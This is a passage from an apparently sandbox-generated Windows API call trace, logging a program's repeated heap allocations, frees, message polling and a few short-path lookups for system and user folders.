(HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xdd5da0 [0270.403] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9448 | out: hHeap=0xcc0000) returned 1 [0270.403] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xdc9ef0 [0270.403] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9448 [0270.403] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xdd5db0 [0270.403] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5db0 | out: hHeap=0xcc0000) returned 1 [0270.403] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9478 [0270.403] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xdd5db0 [0270.403] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5db0 | out: hHeap=0xcc0000) returned 1 [0270.403] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9490 [0270.403] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xdd5db0 [0270.404] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5db0 | out: hHeap=0xcc0000) returned 1 [0270.404] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9448 | out: hHeap=0xcc0000) returned 1 [0270.404] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9478 | out: hHeap=0xcc0000) returned 1 [0270.404] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9490 | out: hHeap=0xcc0000) returned 1 [0270.404] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdc9ef0 | out: hHeap=0xcc0000) returned 1 [0270.404] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5da0 | out: hHeap=0xcc0000) returned 1 [0270.404] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0270.404] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xdc9ef0 [0270.404] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9490 [0270.404] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xdd5da0 [0270.404] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9490 | out: hHeap=0xcc0000) returned 1 [0270.404] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xdc9f18 [0270.404] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9490 [0270.404] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9478 [0270.404] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xdd5db0 [0270.404] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9478 | out: hHeap=0xcc0000) returned 1 [0270.404] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5db0 | out: hHeap=0xcc0000) returned 1 [0270.404] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0270.404] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xdc9f40 [0270.404] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9478 [0270.404] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xdd5db0 [0270.404] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9478 | out: hHeap=0xcc0000) returned 1 [0270.404] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xdc9f68 [0270.404] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9478 [0270.404] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9448 [0270.404] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xdd5dc0 [0270.404] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9448 | out: hHeap=0xcc0000) returned 1 [0270.405] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5dc0 | out: hHeap=0xcc0000) returned 1 [0270.405] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0270.405] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xdc9f90 [0270.405] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9448 [0270.405] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xdd5dc0 [0270.405] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9448 | out: hHeap=0xcc0000) returned 1 [0270.405] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xdc9fb8 [0270.405] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9448 [0270.405] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd94a8 [0270.405] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xdd5dd0 [0270.405] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd94a8 | out: hHeap=0xcc0000) returned 1 [0270.405] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5dd0 | out: hHeap=0xcc0000) returned 1 [0270.405] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0270.405] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xdc9fe0 [0270.405] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd94a8 [0270.405] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xdd5dd0 [0270.405] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd94a8 | out: hHeap=0xcc0000) returned 1 [0270.405] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xdca008 [0270.405] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd94a8 [0270.405] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd94c0 [0270.405] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xdd5de0 [0270.405] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd94c0 | out: hHeap=0xcc0000) returned 1 [0270.405] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5de0 | out: hHeap=0xcc0000) returned 1 [0270.405] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0270.405] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xdca030 [0270.405] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd94c0 [0270.406] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xdd5de0 [0270.406] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd94c0 | out: hHeap=0xcc0000) returned 1 [0270.406] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x30) returned 0xddeeb8 [0270.406] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd94c0 [0270.406] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd94d8 [0270.406] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xdd5df0 [0270.406] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd94d8 | out: hHeap=0xcc0000) returned 1 [0270.406] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5df0 | out: hHeap=0xcc0000) returned 1 [0270.406] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0270.406] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xdca058 [0270.406] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd94d8 [0270.406] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xdd5df0 [0270.406] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd94d8 | out: hHeap=0xcc0000) returned 1 [0270.406] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x30) returned 0xddeef0 [0270.406] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd94d8 [0270.406] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd94f0 [0270.406] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xdd5e00 [0270.406] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd94f0 | out: hHeap=0xcc0000) returned 1 [0270.406] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5e00 | out: hHeap=0xcc0000) returned 1 [0270.406] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0270.406] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xdca080 [0270.406] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd94f0 [0270.406] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xdd5e00 [0270.406] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd94f0 | out: hHeap=0xcc0000) returned 1 [0270.406] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x30) returned 0xddef28 [0270.406] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd94f0 [0270.407] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9508 [0270.407] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xdd5e10 [0270.407] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9508 | out: hHeap=0xcc0000) returned 1 [0270.407] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5e10 | out: hHeap=0xcc0000) returned 1 [0270.407] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0270.407] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xdca0a8 [0270.407] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9508 [0270.407] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xdd5e10 [0270.407] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9508 | out: hHeap=0xcc0000) returned 1 [0270.407] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x30) returned 0xddef60 [0270.407] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9508 [0270.407] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9520 [0270.407] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xdd5e20 [0270.407] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9520 | out: hHeap=0xcc0000) returned 1 [0270.407] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5e20 | out: hHeap=0xcc0000) returned 1 [0270.407] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0270.407] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xdca0d0 [0270.407] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9520 [0270.407] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xdd5e20 [0270.407] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9520 | out: hHeap=0xcc0000) returned 1 [0270.407] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x40) returned 0xd63920 [0270.407] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9520 [0270.407] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9538 [0270.407] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xdd5e30 [0270.407] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9538 | out: hHeap=0xcc0000) returned 1 [0270.408] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5e30 | out: hHeap=0xcc0000) returned 1 [0270.408] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0270.408] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xdca0f8 [0270.408] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9538 [0270.408] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xdd5e30 [0270.408] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9538 | out: hHeap=0xcc0000) returned 1 [0270.408] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x30) returned 0xddef98 [0270.408] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9538 [0270.408] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9550 [0270.408] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xdd5e40 [0270.408] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9550 | out: hHeap=0xcc0000) returned 1 [0270.408] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5e40 | out: hHeap=0xcc0000) returned 1 [0270.408] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0270.408] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xdca120 [0270.408] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9550 [0270.408] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xdd5e40 [0270.408] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9550 | out: hHeap=0xcc0000) returned 1 [0270.408] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x30) returned 0xddefd0 [0270.408] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9550 [0270.408] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9568 [0270.408] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xdd5e50 [0270.408] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9568 | out: hHeap=0xcc0000) returned 1 [0270.408] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5e50 | out: hHeap=0xcc0000) returned 1 [0270.408] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0270.408] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xdca148 [0270.409] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9568 [0270.409] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xdd5e50 [0270.409] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9568 | out: hHeap=0xcc0000) returned 1 [0270.409] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x30) returned 0xddf008 [0270.409] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9568 [0270.409] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9580 [0270.409] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xdd5e60 [0270.409] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9580 | out: hHeap=0xcc0000) returned 1 [0270.409] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5e60 | out: hHeap=0xcc0000) returned 1 [0270.409] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0270.409] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xdca170 [0270.409] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9580 [0270.409] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xdd5e60 [0270.409] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9580 | out: hHeap=0xcc0000) returned 1 [0270.409] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x40) returned 0xcfae98 [0270.409] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9580 [0270.409] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9598 [0270.409] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xdd5e70 [0270.409] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9598 | out: hHeap=0xcc0000) returned 1 [0270.409] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5e70 | out: hHeap=0xcc0000) returned 1 [0270.409] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0270.409] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xdca198 [0270.409] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9598 [0270.409] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xdd5e70 [0270.409] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9598 | out: hHeap=0xcc0000) returned 1 [0270.410] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x40) returned 0xcfaee0 [0270.410] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9598 [0270.410] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd95b0 [0270.410] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xdd5e80 [0270.410] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd95b0 | out: hHeap=0xcc0000) returned 1 [0270.410] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5e80 | out: hHeap=0xcc0000) returned 1 [0270.410] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0270.410] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xdca1c0 [0270.410] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd95b0 [0270.410] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xdd5e80 [0270.410] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd95b0 | out: hHeap=0xcc0000) returned 1 [0270.410] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x40) returned 0xcfaf28 [0270.410] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd95b0 [0270.410] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd95c8 [0270.410] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xdd5e90 [0270.410] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd95c8 | out: hHeap=0xcc0000) returned 1 [0270.410] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5e90 | out: hHeap=0xcc0000) returned 1 [0270.410] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0270.410] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xdca1e8 [0270.410] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd95c8 [0270.410] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xdd5e90 [0270.410] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd95c8 | out: hHeap=0xcc0000) returned 1 [0270.410] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x40) returned 0xcfaf70 [0270.410] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd95c8 [0270.410] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd95e0 [0270.411] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xdd5ea0 [0270.411] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd95e0 | out: hHeap=0xcc0000) returned 1 [0270.411] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5ea0 | out: hHeap=0xcc0000) returned 1 [0270.411] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0270.411] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xdca210 [0270.411] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd95e0 [0270.411] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xdd5ea0 [0270.411] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd95e0 | out: hHeap=0xcc0000) returned 1 [0270.411] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x30) returned 0xddf040 [0270.411] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd95e0 [0270.411] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd95f8 [0270.411] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xdd5eb0 [0270.411] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd95f8 | out: hHeap=0xcc0000) returned 1 [0270.411] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5eb0 | out: hHeap=0xcc0000) returned 1 [0270.411] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0270.411] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xdca238 [0270.411] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd95f8 [0270.411] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xdd5eb0 [0270.411] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd95f8 | out: hHeap=0xcc0000) returned 1 [0270.411] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x50) returned 0xd43728 [0270.411] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd95f8 [0270.411] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9610 [0270.411] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xdd5ec0 [0270.411] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9610 | out: hHeap=0xcc0000) returned 1 [0270.411] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5ec0 | out: hHeap=0xcc0000) returned 1 [0270.411] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0270.412] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xdca260 [0270.412] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9610 [0270.412] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xdd5ec0 [0270.412] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9610 | out: hHeap=0xcc0000) returned 1 [0270.412] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x40) returned 0xcfafb8 [0270.412] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9610 [0270.412] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9628 [0270.412] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xdd5ed0 [0270.412] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9628 | out: hHeap=0xcc0000) returned 1 [0270.412] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5ed0 | out: hHeap=0xcc0000) returned 1 [0270.412] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0270.412] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xdca288 [0270.412] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9628 [0270.415] GetShortPathNameW (in: lpszLongPath="C:\\Program Files (x86)\\Common Files", lpszShortPath=0x8cf77c, cchBuffer=0x7fff | out: lpszShortPath="C:\\PROGRA~2\\COMMON~1") returned 0x14 [0270.417] GetShortPathNameW (in: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpszShortPath=0x8cf77c, cchBuffer=0x7fff | out: lpszShortPath="C:\\Users\\5P5NRG~1\\Desktop") returned 0x19 [0270.418] GetShortPathNameW (in: lpszLongPath="C:\\Program Files (x86)", lpszShortPath=0x8cf77c, cchBuffer=0x7fff | out: lpszShortPath="C:\\PROGRA~2") returned 0xb [0270.418] GetShortPathNameW 